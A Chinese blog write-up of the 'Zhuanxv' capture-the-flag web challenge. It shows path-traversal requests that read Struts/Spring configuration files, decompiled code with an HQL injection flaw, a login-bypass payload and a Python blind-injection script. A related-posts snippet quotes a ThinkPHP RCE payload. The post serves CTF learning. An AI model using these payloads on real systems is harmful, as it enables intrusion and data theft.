攻防世界 WEB ZHUANXV

最新推荐文章于 2024-04-04 22:42:44 发布
最新推荐文章于 2024-04-04 22:42:44 发布
阅读量418 收藏 3
点赞数 1
分类专栏: 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/120156854
版权

web安全

打开场景,根据提示提示,扫描目录,扫出来一个/list,提示要先登录,先抓个包看看,在第二个包出抓到了形如/loadimage?fileName=web_login_bg.jpg
再熟悉不过了,文件包含,结合cookie里的phpsession和jsessionid可以判断出,后端同时使用了java和php
那么,既然是java项目,就尝试读取一下web.xml,这个是javaweb项目最基础的一个xml文件,一般再WEB-INF目录下
构造/loadimage?fileName=…/…/WEB-INF/web.xml
WEB.XML

<?xml version="1.0" encoding="UTF-8"?>
<web-app id="WebApp_9" version="2.4"
         xmlns="http://java.sun.com/xml/ns/j2ee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
    <display-name>Struts Blank</display-name>
    <filter>
        <filter-name>struts2</filter-name>
        <filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>struts2</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>
    <welcome-file-list>
        <welcome-file>/ctfpage/index.jsp</welcome-file>
    </welcome-file-list>
    <error-page>
        <error-code>404</error-code>
        <location>/ctfpage/404.html</location>
    </error-page>
</web-app>

读出来是一个struts项目,那就好办了,struts是mvc的c层,常用目录,struts.xml(用于url匹配),applicationContext.xml(用于不同层框架的整合)
分别构造/loadimage?fileName=…/…/WEB-INF/classes/struts.xml
/loadimage?fileName=…/…/WEB-INF/classes/applicationContext.xml
单纯的struts项目结构问题
STRUTS.XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE struts PUBLIC

        "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"

        "http://struts.apache.org/dtds/struts-2.3.dtd">

<struts>

	<constant name="strutsenableDynamicMethodInvocation" value="false"/>

    <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />

    <constant name="struts.action.extension" value=","/>

    <package name="front" namespace="/" extends="struts-default">

        <global-exception-mappings>

            <exception-mapping exception="java.lang.Exception" result="error"/>

        </global-exception-mappings>

        <action name="zhuanxvlogin" class="com.cuitctf.action.UserLoginAction" method="execute">

            <result name="error">/ctfpage/login.jsp</result>

            <result name="success">/ctfpage/welcome.jsp</result>

        </action>

        <action name="loadimage" class="com.cuitctf.action.DownloadAction">

            <result name="success" type="stream">

                <param name="contentType">image/jpeg</param>

                <param name="contentDisposition">attachment;filename="bg.jpg"</param>

                <param name="inputName">downloadFile</param>

            </result>

            <result name="suffix_error">/ctfpage/welcome.jsp</result>

        </action>

    </package>

    <package name="back" namespace="/" extends="struts-default">

        <interceptors>

            <interceptor name="oa" class="com.cuitctf.util.UserOAuth"/>

            <interceptor-stack name="userAuth">

                <interceptor-ref name="defaultStack" />

                <interceptor-ref name="oa" />

            </interceptor-stack>



        </interceptors>

        <action name="list" class="com.cuitctf.action.AdminAction" method="execute">

            <interceptor-ref name="userAuth">

                <param name="excludeMethods">

                    execute

                </param>

            </interceptor-ref>

            <result name="login_error">/ctfpage/login.jsp</result>

            <result name="list_error">/ctfpage/welcome.jsp</result>

            <result name="success">/ctfpage/welcome.jsp</result>

        </action>

    </package>

</struts>

applicationContext.XML

<?xml version="1.0" encoding="UTF-8"?>

<beans xmlns="http://www.springframework.org/schema/beans"

       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">

    <bean id="dataSource" class="org.springframework.jdbc.datasource.DriverManagerDataSource">

        <property name="driverClassName">

            <value>com.mysql.jdbc.Driver</value>

        </property>

        <property name="url">

            <value>jdbc:mysql://localhost:3306/sctf</value>

        </property>

        <property name="username" value="root"/>

        <property name="password" value="root" />

    </bean>

    <bean id="sessionFactory" class="org.springframework.orm.hibernate3.LocalSessionFactoryBean">

        <property name="dataSource">

            <ref bean="dataSource"/>

        </property>

        <property name="mappingLocations">

            <value>user.hbm.xml</value>

        </property>

        <property name="hibernateProperties">

            <props>

                <prop key="hibernate.dialect">org.hibernate.dialect.MySQLDialect</prop>

                <prop key="hibernate.show_sql">true</prop>

            </props>

        </property>

    </bean>

    <bean id="hibernateTemplate" class="org.springframework.orm.hibernate3.HibernateTemplate">

        <property name="sessionFactory">

            <ref bean="sessionFactory"/>

        </property>

    </bean>

    <bean id="transactionManager" class="org.springframework.orm.hibernate3.HibernateTransactionManager">

        <property name="sessionFactory">

            <ref bean="sessionFactory"/>

        </property>

    </bean>

    <bean id="service" class="org.springframework.transaction.interceptor.TransactionProxyFactoryBean" abstract="true">

        <property name="transactionManager">

            <ref bean="transactionManager"/>

        </property>

        <property name="transactionAttributes">

            <props>

                <prop key="add">PROPAGATION_REQUIRED</prop>

                <prop key="find*">PROPAGATION_REQUIRED,readOnly</prop>

            </props>

        </property>

    </bean>

    <bean id="userDAO" class="com.cuitctf.dao.impl.UserDaoImpl">

        <property name="hibernateTemplate">

            <ref bean="hibernateTemplate"/>

        </property>

    </bean>

    <bean id="userService" class="com.cuitctf.service.impl.UserServiceImpl">

        <property name="userDao">

            <ref bean="userDAO"/>

        </property>

    </bean>

</beans>

读出来发现几个关键类,UserLoginAction,UserDaoImpl,UserServiceImpl,同时可以知道是mysql数据库,hibernate框架
经典的ssh
由于源码里把src路径删了,所以只能通过.class文件反编译出类的内容,jd-gui,理一下逻辑,
UserLoginAction,调用了UserServiceImpl里的loginCheck方法进行登录检验,要求返回User对象个数只能是一个

public boolean userCheck(User user) {
    List<User> userList = this.userService.loginCheck(user.getName(), user.getPassword());
    if (userList != null && userList.size() == 1)
      return true; 
    addActionError("Username or password is Wrong, please check!");
    return false;
  }

UserServiceImpl在做了=和空格的过滤后调用UserDaoImpl进行数据库查询

public List<User> loginCheck(String name, String password) {
    name = name.replaceAll(" ", "");
    name = name.replaceAll("=", "");
    Matcher username_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(name);
    Matcher password_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(password);
    if (password_matcher.find())
      return this.userDao.loginCheck(name, password); 
    return null;
  }

UserDaoImpl完成了数据库的查询,这里可以看出,sql语句没有做任何的处理,只要闭合单引号,就可以进行绕过

public class UserDaoImpl extends HibernateDaoSupport implements UserDao {
  public List<User> findUserByName(String name) {
    return getHibernateTemplate().find("from User where name ='" + name + "'");
  }
  
  public List<User> loginCheck(String name, String password) {
    return getHibernateTemplate().find("from User where name ='" + name + "' and password = '" + password + "'");
  }
}

于是本着这个思路,构造万能密码user.name=admin%27%0Aor%0A%271%27%3E%270'%0Aor%0Aname%0Alike%0A'admin&user.password=1
至于为什么是要用两个or,对我这样的新手可能要想很久,很多wp也没写,后来和别的师傅讨论后发现,mysql里and优先级比or高
那么两个or的作用是保证永真,简单举个例,一个or:admin’ or ‘1’>‘0’ and password=1 表示为false or true and false,先执行true and false,
为false再有false or false,就是false(我做弊了,后面用payload检测过,数据库里User只有一条数据,且不是admin,这跟原题不一样
,这是简化版,因此找源码自己搭的师傅会感觉payload不一样很正常),可能是我太菜了,别人不惜的写。。。。
而两个false or true or true and true是true,因此根据这个逻辑,可以进行盲注
至于flag在哪,之前漏了一个user.hbm.xml,是给hibernate框架用的对象和表列的对应关系

<?xml version="1.0"?>

<!DOCTYPE hibernate-mapping PUBLIC

        "-//Hibernate/Hibernate Mapping DTD 3.0//EN"

        "http://hibernate.sourceforge.net/hibernate-mapping-3.0.dtd">

<hibernate-mapping package="com.cuitctf.po">

    <class name="User" table="hlj_members">

        <id name="id" column="user_id">

            <generator class="identity"/>

        </id>

        <property name="name"/>

        <property name="password"/>

    </class>

    <class name="Flag" table="bc3fa8be0db46a3610db3ca0ec794c0b">

        <id name="flag" column="welcometoourctf">

            <generator class="identity"/>

        </id>

        <property name="flag"/>

    </class>

</hibernate-mapping>

flag在数据库bc3fa8be0db46a3610db3ca0ec794c0b的welcometoourctf列里,在hibernate框架里,被封装成Flag类
因此只需要select id from Flag,即可完成查询
有了注入点和sql语句。那就可以进行盲注了,上才艺

import requests

s = requests.session()

flag = ''
for i in range(1, 50):
    p = ''
    for j in range(1, 255):
        payload1="(select%0Acount(name)%0Afrom%0AUser)<"+str(j)#爆破User表数据条数
        payload2="(select%0Aascii(substr(name,"+str(i)+",1))%0Afrom%0AUser)<'" + str(j) + "'" #爆破User表用户名
        payload3 = "(select%0Aascii(substr(id," + str(i) + ",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'" + str(j) + "'"
        url = "http://111.200.241.244:64128/zhuanxvlogin?user.name=admin'%0Aor%0A" + payload3 + "%0Aor%0Aname%0Alike%0A'admin&user.password=1"
        r1 = s.get(url)
        if len(r1.text) > 20000 and p != '':
            flag += p
            print(i, flag)
            break
        p = chr(j)

这题在buuctf里也有,只不过靶场容器似乎不太想让你爆破,跑几个请求就404了,而且更换了flag所以你可以看到这一题只有6位大佬解出来了,是的只有六个,不知道大佬是怎么做的
参考视频链接:https://www.bilibili.com/video/BV1Nq4y1S787

显哥无敌
关注
专栏目录
【网络安全 | CTF】攻防世界 web2 解题详析
等风来
05-25 3564
可通过逆向加密算法的步骤,对 $miwen 进行相反的操作,即先使用 str_rot13 还原,然后使用 strrev 翻转,再使用 base64 解码,最后对每个字符的 ASCII 值减 1 ,再进行翻转即可得到 flag。其中,str_rot13 是一个简单的字符替换算法,将每个字符替换为它在字母表中向后移动 13 位后对应的字符。这个算法是一种经典的简单加密方法,可以用来隐藏字符串的真实含义。这段代码定义了一个函数 encode,接受一个字符串参数 $str,并返回对其进行加密后的结果。
攻防世界 web高手进阶区 10分题 TimeKeeper
闵行小鱼塘
10-19 1397
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是TimeKeeper的writeup
攻防世界 web高手进阶区 7分题 Zhuanxv
闵行小鱼塘
08-12 719
继续ctf的旅程,开始攻防世界web高手进阶区的7分题,本文是Zhuanxv的writeup
xctf攻防世界 Web高手进阶区 Zhuanxv
l8947943的博客
01-07 1455
1.进入环境,查看内容 没有什么其他信息,尝试dirsearch一下,如图: 发现有/list页面,我们尝试一下,发现让登录,如图: 猜测是需要想办法登入,从而拿到flag 2.问题分析 对内容进行抓包 先forward,然后再通过action送入repeater,如图: 发现图片是请求加载的,也就是通过后端传说过来的,那么可以响应的url,如图: 通过/loadimage?fileName=web_login_bg.jpg拿到了图片。既然知道了服务器的地址和请求路径,我们就通过路径访问得到项目的
攻防世界web进阶区Zhuanxv详解
hxhxhxhxx的博客
08-13 1574
攻防世界web进阶区Zhuanxv详解题目提示:详解 题目 提示: 详解 扫描目录发现了一个list 我们使用了好几个扫描工具,只有wwwscan,和webdirscan可以,(可能是我字典太菜了) 发现需要登录 查看源代码发现,这里有问题,加载图片的方式很诡异 试试文件读取 他的cookie里有jessionid 说明他是使用JAVA写的网页 那么我们尝试找找web.xml strust ...
攻防世界web进阶区zhuanxv
gongjingege的博客
08-10 592
SCTF 题目描述:你只是在扫描目标端口的时候发现了一个开放的web服务 打开链接是一个显示时间的页面 dirsearch扫一下 打开list页面 抓包看一下 看到JSESSIONID,得知是java web,读取配置文件web.xml 考虑了一下会不会是sql注入 看看源码,里边有个导入路径 打开url 会下载一张图片,但不能查看,notepad++看下源码 这里struts2有另一个大佬的解释 https://www.cnblogs.com/mke2fs/p/11519039.html 然后
【愚公系列】2023年06月 攻防世界-WebZhuanxv
时光隧道
06-18 3993
dirsearch是一个用于寻找Web服务器上隐藏目录和文件的Python脚本。它可以帮助您发现会被忽视的文件和文件夹,从而提高Web应用程序的安全性。暴力枚举目录和文件搜索常用的Web目录和文件查找隐藏的Web页面和应用程序检查Web服务器配置错误使用dirsearch需要在命令行中输入一些参数和选项。暴力枚举目录: dirsearch.py -u -e搜索常用的Web目录和文件: dirsearch.py -u -w。
攻防世界web
热门推荐
kid的博客
05-23 2万+
攻防世界web 前言 准备ctf比赛,这里把攻防世界分值低于5分的基本刷了一遍(分值再高刷不动了…) 练习 view_source 没难度知识禁用了右键点击,ctrl+u查看源码拿到flag get_post 这题没什么好说的,按着提示来就能拿flag 但我发现下面的hackbar不能用后用burp来进行post传参不返回flag…迷了我很久… 结果我下了左边那个hackbar后重来一...
攻防世界 web高手进阶区 10分题 Guess
闵行小鱼塘
11-03 1328
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Guess的writeup
【xctf之Zhuanxv
qq_40646572的博客
10-13 725
打开链接地址,发现就一个这,没任何提示。那就web目录先来一波扫描。发现了一个页面,先看下。是个后台登陆界面,大胆猜测存在弱口令?爆破失败。没办法了,先看看网页源码还有网络请求吧。看到这个请求是请求背景图片加载,看着和正常的图片加载感觉不太一样,是不是存在任意文件读取呢?尝试文件读取fuzz,失败。(有一说一,到这我就没思路了。。。。。我是真的菜。)看了官方writeup,发现github搜索了下Zhuanxv,可是我找到git项目的时候啥也没有就一个没用的默认用户和密码。
sctf2018-zhuanxv:SCTF2018-Zhuanxv Docker(源码)&Writeup
05-11
sctf2018-zhuanxv 部署 启动 ./start_up.sh 停止 docker-compose down WP 第一步:信息收集 信息收集,发现github上遗留的说明。 根据提供的url进入登录地址,发现用户名密码已经无法登陆 第二步:下载源码 查看网页源代码,发现背景图片的加载方式使用./loadimage?fileName=web_login_bg.jpg ,找到任意文件下载点,下载一系列文件。这里限制了下载文件的后缀只有class xml jpg css等。 第三步:代码审计 根据github的commit记录 了解实现类的位置。 从user.hbm.xml得知表名和类名映射 从com/cuitctf/service/impl/UserServiceImpl.class得知过滤规则,用户名只过滤空格和等号,密码限制只能字母+数字 从com/cuitctf/dao/i
[SCTF 2018]ZhuanXV
Sk1y的博客
12-19 872
赛题:[SCTF 2018]ZhuanXV 文章目录赛题:[SCTF 2018]ZhuanXV读取文件sql注入漏洞 读取文件 使用dirsearch工具进行扫描 发现/list,访问是个登录界面,查看源码 发现背景图片的路径 查看web.xml http://111.200.241.244:63455/loadimage?fileName=../../WEB-INF/web.xml 发现使用了strut2框架, struts.xml是struts2的核心配置文件,在开发过程中利用率最高。该文件主
CTF 之Zhuanxv
最新发布
qq_74263993的博客
04-04 930
UserServiceImpl.class反编译后代码中是对空格进行了过滤,而sql中对回车自动过滤, 因此我们可以将空格字符换成%0A(ascii码表示换行符)。User.class反编译后是一个Bean文件,UserLoginAction.class反编译后是登录验证逻辑文件,InitApplicationContext.class反编译后是类加载器文件。其中暴露了使用的数据库,数据库账号密码,且其中包含了user.hbm.xml等配置文件,同样我们将其下载出来。很可惜进来了还是没有一点线索。
[wp] SCTF 2018 Zhuanxv
MercyLin的博客
09-18 1891
扫目录发现/list,点进去发现要登陆,抓包发现一个请求为 试一下有没有文件读取漏洞
攻防世界 WEB unfinish
qq_41696858的博客
08-31 159
这题考的是sql注入里的二次注入 看了半天login界面,发现没什么好利用的,考虑是否其他页面有可供利用的注入点 先用dirsearch扫一波,发现register页面,这个页面里多了一个username参数,那么这就是我们这题的关键点,在注册完成后,登录, username会在主页里面回显,而且login界面显然没有对username做过滤, 所以手动尝试payload:1’+'1 只要登陆成功后页面回显的username是2,就说明二次注入成立 下面就是爆破问题 由于过滤了一堆关键字,所以需要通过asc
攻防世界7分~部分8分题
goddemon
10-21 466
Web_php_wrong_nginx_config 进入页面发现是两个输入框 初步考虑是不是注入 发觉不论输入什么都是返回–>网站正在建设中 于是排除注入 拿出御剑 扫描到admin页面 然后抓包发觉存在isLogin=0(后面发觉全部的都有)–>初步想法肯定是要改这个参数的,只是不知道在那个页面中改具有意义 于是接着扫描 发觉robots.txt–>存在两个页面 于是均尝试一遍–>发觉在Hack.php中可绕过 然后点击发觉 管理中心处存在路径file=index状况类–&
web做题记录(buuoj,jarvis,攻防世界,bugku,hackme)
CJB6988125的博客
11-19 1万+
web做题笔记 buuoj easy_tornado tornado是一个python写的web服务器 读取文件hint.txt:md5(cookie_secret+md5(filename)) 我们只要找到cookie_secret 就能读取任意文件 直接搜cve:找到一个\r\n分割请求的。。好像搞不到cookie_secret 找到error?msg=Error模板注入??? {{1.}}出...
XCTF(攻防世界)—进阶web题Write Up(二)
Lemon's blog
09-05 695
前言:继续总结学到的新知识 mfw 在about页面发现,搭建网站时用了git,尝试一下是否为git源码泄露 输入: http://111.198.29.45:36544/.git/ 果然是源码泄露,那就查看一下文件,发现并没有找到flag,在Github上下载git源码泄露工具,可以得到其源码。 输入相应的命令: python2 GitHack.py http://111.198.29....
[wp] 攻防世界 php_rce
MercyLin的博客
09-25 7712
根据提示,上网搜了下thinkphp5 rce漏洞,改一改payload就出了emmm ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 下次写个...
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值